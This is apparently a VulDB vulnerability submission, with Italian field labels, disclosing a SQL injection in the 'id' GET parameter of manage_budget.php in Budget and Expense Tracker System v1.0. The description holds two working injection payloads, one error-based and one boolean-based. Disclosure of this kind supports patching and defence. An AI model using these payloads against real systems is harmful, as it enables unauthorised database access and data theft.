| Titolo | Budget and Expense Tracker System v1.0 /expense_budget/admin/budget/manage_budget.php GET parameter id exists SQL injection vulnerability |
|---|
| Descrizione | An issue was discovered in Budget and Expense Tracker System v1.0.
There is a SQL injection that can directly issue instructions to the background database system via /expense_budget/admin/budget/manage_budget.php?id.
Payload1: id=1' and (select 2 from(select count(*),concat(0x55565758,(select (elt(888=888,1))),0x65666768,floor(rand(0)*2))x from information_schema.plugins group by x)a) and 'a'='a
Payload2: id=1' and 777=777 and 'GSD'='GSD |
|---|
| Fonte | ⚠️ https://github.com/wucwu1/CVEApplication/blob/main/SQL.md |
|---|
| Utente | wucwu1 (UID 46807) |
|---|
| Sottomissione | 17/05/2023 03:38 (3 anni fa) |
|---|
| Moderazione | 17/05/2023 18:53 (15 hours later) |
|---|
| Stato | Accettato |
|---|
| Voce VulDB | 229278 [SourceCodester Budget and Expense Tracker System 1.0 GET Parameter manage_budget.php ID iniezione SQL] |
|---|
| Punti | 20 |
|---|